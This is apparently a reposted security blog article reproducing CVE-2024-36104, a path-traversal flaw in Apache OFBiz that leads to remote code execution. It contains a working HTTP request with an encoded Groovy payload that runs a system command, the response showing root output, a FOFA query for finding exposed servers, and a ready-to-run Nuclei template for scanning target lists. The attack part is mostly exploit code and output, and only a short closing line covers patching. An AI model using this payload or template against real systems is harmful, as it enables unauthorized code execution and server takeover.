CVE-2024-36104 Vulnerability Reproduction (with POC)

admin, 2024-06-07 09:17:50


01

Vulnerability Name

Apache OFBiz directory traversal leading to code execution

02

Affected Versions

Apache OFBiz versions before 18.12.14

03

Vulnerability Description

Apache OFBiz is an e-commerce platform for building large and medium-sized, enterprise-grade, multi-tier, distributed e-commerce applications that run across platforms, databases and application servers. It is an enterprise resource planning (ERP) system from the Apache Software Foundation (USA) and provides a complete set of Java-based web application components and tools. Apache OFBiz versions before 18.12.14 contain a command execution vulnerability: the org.apache.ofbiz.webapp.control.ControlFilter class does not properly restrict special characters in the request URL path (such as ; and %2e), so an attacker can bypass the filter that protects back-end functionality and use the programmatic export feature of the /webtools/control/ProgramExport endpoint to execute arbitrary Groovy code and obtain system privileges.

04

FOFA search query
app="Apache_OFBiz"


05

Vulnerability Reproduction

Send the following request to the test target to execute the id command:

POST /webtools/control/forgotPassword/%2e/%2e/ProgramExport HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.35
Connection: close
Content-Length: 262
Content-Type: application/x-www-form-urlencoded
user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip

groovyProgram=u0074u0068u0072u006fu0077u0020u006eu0065u0077u0020u0045u0078u0063u0065u0070u0074u0069u006fu006eu0028u0027u0069u0064u0027u002eu0065u0078u0065u0063u0075u0074u0065u0028u0029u002eu0074u0065u0078u0074u0029u003b

The response is shown below; the key part is the error message carrying the command output:

java.lang.Exception: uid=0(root) gid=0(root) groups=0(root)

HTTP/1.1 200 OK
Connection: close
Transfer-Encoding: chunked
Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Access-Control-Expose-HeadersAuthorization, content-type,Set-Cookie,CONFIG-KEY,access-control-request-headers,access-control-request-method,accept,origin,authorization,x-requested-with,responseType,observe
Access-Control-Allow-Methods: POST, PUT, GET, OPTIONS, DELETE
Access-Control-Expose-Headers: Authorization
Access-Control-Expose-Headers: responseType
Access-Control-Expose-Headers: observe
Content-Type: text/html;charset=UTF-8
Date: Thu, 06 Jun 2024 01:35:42 GMT
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=32E1AA389DCD8C9DE7695C95E54FD4A3.jvm1; Path=/webtools/; HttpOnly
Set-Cookie: OFBiz.Visitor=3139929; Expires=Fri, 06-Jun-2025 01:35:42 GMT; Path=/
Vary: Accept-Encoding
X-Powered-By: Servlet/3.1 JSP/2.3 (Apache Tomcat/8.0.33 Java/Red Hat, Inc./1.8.0_292-b10)

<!DOCTYPE html><html lang="zh-cn" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head>...<title>OFBiz&#x3a; Web&#x5de5;&#x5177;: XML&#x6570;&#x636e;&#x5bfc;&#x51fa;&#x5168;&#x90e8;</title>...</head><body>...
<div class="hintImg hintFont errorFont"><img src="/images/hintImages/error.png" class="messImg"/>&#x53d1;&#x751f;&#x4e86;&#x4e0b;&#x9762;&#x7684;&#x9519;&#x8bef;:java.lang.Exception: uid=0(root) gid=0(root) groups=0(root)</div>
...<h3>Web&#x5de5;&#x5177;&#x6743;&#x9650;&#x9519;&#x8bef;</h3>...</body></html>

Reproduction successful.

06

Nuclei POC

The POC file contents are as follows:

id: CVE-2024-36104

info:
  name: Apache-OFBiz存在路径遍历导致RCE漏洞
  author: fgz
  severity: critical
  description: Apache OFBiz是一个电子商务平台,用于构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类应用系统。是美国阿帕奇(Apache)基金会的一套企业资源计划(ERP)系统。该系统提供了一整套基于Java的Web应用程序组件和工具。Apache OFBiz 18.12.14之前版本存在命令执行漏洞,该漏洞源于org.apache.ofbiz.webapp.control.ControlFilter类对路径(请求URL中的特殊字符(如 ;、%2e)限制不当导致攻击者能够绕过后台功能点的过滤器验证,并通过/webtools/control/ProgramExport接口的编程导出功能执行任意Groovy代码获取系统权限。
  metadata:
    max-request: 1
    fofa-query: app="Apache_OFBiz"
    verified: true

requests:
  - raw:
      - |+
        POST /webtools/control/forgotPassword/%2e/%2e/ProgramExport HTTP/1.1
        Host: {{Hostname}}
        user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
        Content-Type: application/x-www-form-urlencoded

        groovyProgram=u0074u0068u0072u006fu0077u0020u006eu0065u0077u0020u0045u0078u0063u0065u0070u0074u0069u006fu006eu0028u0027u0069u0064u0027u002eu0065u0078u0065u0063u0075u0074u0065u0028u0029u002eu0074u0065u0078u0074u0029u003b

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200 && contains(body, 'uid=') && contains(body, 'gid=')"

Run the POC:

nuclei.exe -t mypoc/cve/CVE-2024-36104.yaml -l data1.txt


07

Remediation

The vendor has released a security update; upgrade to 18.12.14 or later.

Originally published on the WeChat public account AI与网安: CVE-2024-36104 Vulnerability Reproduction (with POC)

  • When reposting, please keep this article's link (CN-SEC Chinese Network; thanks to the original author): CVE-2024-36104 Vulnerability Reproduction (with POC) https://cn-sec.com/archives/2825655.html
